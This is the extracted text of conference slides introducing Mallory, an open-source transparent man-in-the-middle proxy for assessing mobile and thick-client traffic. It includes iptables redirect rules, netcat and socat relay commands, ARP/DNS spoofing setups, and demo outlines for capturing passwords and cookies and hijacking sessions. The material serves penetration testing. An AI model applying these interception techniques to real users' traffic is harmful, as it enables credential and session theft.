Who are we? Jeremy Allen Rajendra Umadas

What do we do? Black box Mobile App

Assessments, Thick Clients, Web apps

Why Mallory Exists?

Proxy setups for apps Throwaway tools that

are all similar

“Scratching the Itch…” Introducing: Mallory Architecture/Design Open Source Tool

Demos

2

*Updated Slides: http://intrepidusgroup.com/insight/mallory

Other than carbon-based multi-cellular life forms

3

4

Principal Consultant at Intrepidus Group

Teaches Secure Coding

Writes Python Code

Breaks things

Youngin’ of the group

Bitten by security bug in college

Mobile Application Security == fun Legacy Bugs

First (of many) Black Hats

5

6

A small demonstration of a task Mallory excels at

7

Mobile App AssessmentsQUALCOMM/BREW, RIM, WinMo, iPhone, Android

Other devices and product assessments (closed devices)

Assess applications ON the device as delivered

Network focused attacks requiredWeb Application AssessmentsX$$ -- It pays the bills.

Blackboxy-stuffThick client apps/plugins that talk somehow

Binary protocols

8

Mobile Applications and Thick Clients

Often just a thick client using HTTP to transport data

Web Applications

May not be real HTTP (AMF, Other HTTP encapsulated binary protocols)

Example: Video on Demand with HTTP Pipelining – broke most proxies in some way

9

The above targets sometimes use proprietary transport protocols.

It may be hard to force a thick client or mobile app to tunnel data through HTTP proxy even if they use HTTP for transport

Web Apps may use ActiveX, Flash, or various other modules that add non-standard traffic

10

11

“Roll your own” clients

Many small scripts per engagement

Throwaway code per-engagement

Someone else wrote the proxy and we can’t change the code easily

12

It’s not using HTTP.. what is it ?

Binary protocols

Multiple streams stuffed into one SSL socket

Example: SSL protected phone applications, SSL VPNs

13

Gather Data Figure out what we need

Server IP(s)

Server Port(s)

TCP or UDP?

Buffer sizes???

Any other anomalous characteristics

14

15

ARP Spoofing

DNS Control

Routing / NAT / Mangling

Protocol specific proxying

16

17

18

-A PREROUTING -i eth1 -p tcp -m tcp --dport80 -j REDIRECT --to-ports 1231

-A PREROUTING -i eth1 -p tcp -m tcp --dport443 -j REDIRECT --to-ports 1232

-A PREROUTING -i eth1 -p tcp -m tcp --dport4356-j REDIRECT --to-ports 1233

19

netcat

nc -l -p 1231 | nc host 80

nc -l -p 1232 | nc host 443

nc -l -p 1233 | nc host 4356

socat

socat -v -v -x tcp-listen:80 host:80

20

21

Use scripting language to manipulate traffic in *cat setup (Python, Ruby, Perl, Whatever)

Tool is often very specific to application being assessed

Requires touchy sniffing, routing, NAT, IPTablesand black magic to get it all flowing properly

Brittle

When they just want to make our lives difficult

Rube Goldberg

No one tool solves the problem very generically Tools work well, just don’t meet some specific specifications

(Buffer size, platform intricacies,…)

Common problem that app assessors must solve in a slightly different manner per application and environment

Time to hack it together OR we solve it once generically for the majority of cases (We are lazy)

22

Existing Proxies: Web Scarab, Burp, Paros, PFI, others.

Need to configure application and the proxy for full duplex communication

HTTP proxies don’t always work: NTP, FTP, SSH, SMTP, others

Limitations:▪ Application might not support proxy setting

▪ Manual configuration of proxy endpoint

▪ May still require fancy IPTables, DNS and other control means

23

<redacted>

24

25

Transparent aware proxy for TCP and UDP

Decode Protocols

GUI Based “Debugger”

Rule system▪ Edited in a file or in the GUI

▪ Modify traffic on the fly

▪ Determine what traffic is sent to the debugger

26

Acknowledgements

▪ Mike Zusman (EvProxy)

▪ Aaron Rhodes

▪ Rajendra Umadas (Shaboopi)

▪ Jeremy Allen (Mallory)

▪ Adam Pridgen

▪ Others!

Team provided testing, ideas and code!

27

Protocols▪ Currently knows: HTTP, HTTPS, SSL, DNS and SSH▪ Easy to implement new protocols

Plugins▪ Per protocol▪ HTTP and HTTPS well supported at this point▪ Extensible platform for all MiTM needs on supported

protocols

Proxification of Traffic▪ Can turn of transparency awareness and force traffic to an

external proxy

28

On a WiFi Access point

On a VPN Concentrator

On a VM Networks

On Net Books

29

30

Released right now

Available on bitbucket▪ bitbucket.org/IntrepidusGroup/mallory

Mallory requires root privileges and an entire machine: we use it as a virtual machine mainly.

Mallory is also readily usable as a malicious access point (and many applications necessitate this approach)

31

Python2.6, python2.6-dev python-setuptools python-pyasn1 python-netfilter libnetfilter-conntrack-dev pynetfilter_conntrack netfilter-extensions-source libnetfilter-conntrack3-dbg libnetfilter-conntrack1_0.0.99-1_i386.deb python-paramiko (http://software.inl.fr/trac/wiki/pynetfilter_conntrack)

32

Application Transparent Aware

Extensible ProgrammaticInstream Modification

Manual Instream Modification

Non-HTTP

Mallory X X X X X

Burp (HTTP Proxies)

X

PFI X X X

Cain and Abel

X

Middler X X

Ettercap X X X

Netsed X X

Squid X * X

33

Mallory is a standard UDP and TCP server

Two threads per MiTM connection (one for the source and one for the destination)

Traffic Directions “C2S” = Client to Server “S2C” = Server to Client

Plugins are called in the middle of the shovel at the right spots per protocol

34

Use mercurial and bitbucket to get the tool

* hg clone https://user@bitbucket.org/IntrepidusGroup/mallory

After hg checkout

Read SETUP README

35

Options

No transparent

▪ Change listen port

▪ Specify the protocol to use

▪ Removes root and kernel dependencies

Specify the traffic database

Proxify (Send to some other destination)

36

-d / –trafficdb

Specify the traffic database name, default is "trafficdb”SQLITE databases are used.

-p / --protoSpecify the protocol to use. This is only useful with the no-

transparent option. You must specify the module inside of the protocol package as well as the exact protocol class to instantiate.

Example: -p sslproto.SSLProtocol or -p ssh.SSHProtocol or -p http.HTTP

37

TABLE: connections

connCount INTEGER – Uniquely identifies a TCP Stream in this database. Usedto JOIN on from flows table

serverIp TEXT,serverPort INTEGER : Original destination where packet is going (pre-REDIRECT)

clientIp TEXT, clientPort INTEGER (Victim client)

TABLE: flowsActual data in connectionsBuffer sizes of real connection are preserved.

conncount INTEGER: Unique ID for this flow maps to connectionsdirection TEXT,: “c2s” / “s2c”buffindex INTEGER: Increasing number for this streamtimestamp FLOAT,: Seconds since epoch.buffer BLOB: The actual data received.

38

TABLE: dgram : for UDP “connectionless” data

saddr : IP Address in normal dotted quad formatsport: Integer source port

daddr : IP Addres in dotted quad

dport INTEGER:destination port

direction TEXT : “c2s” or “s2c”

body BLOB: The actual data contained in the packettimestamp: seconds since the epoch

39

“Debugging Clients” use XMLRPC to Talk to the Mallory server

Mallory has a GUI interface and a prototype style CLI interface

CLI is just to show how to interact with the GUI

40

Uses same XMLRPC mechanism to talk to server

41

Protocol decoding implementations

Plugins are how we want everyone to extend existing protocols

Plugins and Protocols are clean abstractions

We tried hard to make this neat and tidy

We already use this and write custom protocols and plugins for engagements

TODO: Documentation (coming to a bitbucketrepository near you)

42

Get up and stretch!!!!

43

SSH MiTM

Overview of Python Paramiko

Things we will be doing soon: Port Forwarding

Logging of SSH data

44

I hacked your bank (HTTPS)

All your passwords and cookies are captured by mallory

Mobile apps like HTTP. HTTP is EVERYWHERE

Custom logging of HTTP data

45

Walk through a stream editing scenario

Walk through rule editing and explain the rule system in more detail if we need to

Show stream editing

46

Show how cool rules are: MuckPipe! show off the gzipstripper and then replace something.

Replaces NetSed – can be modified in the rule GUI

Autosend and rules make it easy to get to the data you need

Show command line version and in the GUI

Show GZIP / Deflate removal

Show VNC hax

47

Quick code walkthrough of why HTTPS and the architecture is beautiful

Show how we generate certificates on the fly and why that is cool

Future: Zero byte size, on the fly, in memory certificates

48

HTTP -- Session Hijacking

Show off the sexy chrome hijacking plugin

Capture session data Visit Site Pwn

Useful for mobile apps we then want to load a real browser

And.. Of course.. It is session hijacking in two clicks

Explain SOP and why we used a plugin

Show some more code! Less than one hundred lines of code for the Mallory part

49

HTTP – Image Inversion

You may have already seen this ;-)

Very neat because it is a very simple plugin –Show case the ease of implementing this plugin. Make anyone feel like they can write a Mallory plugin

50

Most applications use DNS to find their target server

We can use our DNS A-Record lookup module to easily send it to an internal server

Future: Make this a plugin, as it should be. Integrate this into the GUI. Not done yet because it is something that gets changed once

51

Mallory: Generic TCP and UDP MiTMproxy

Extensible, versatile, open source. Blog:

http://intrepidusgroup.com/insight twitter.com/intrepidusgroup Keep up on the project here: http://bitbucket.org/IntrepidusGroup/mallory

http://intrepidusgroup.com/insight/mallory

52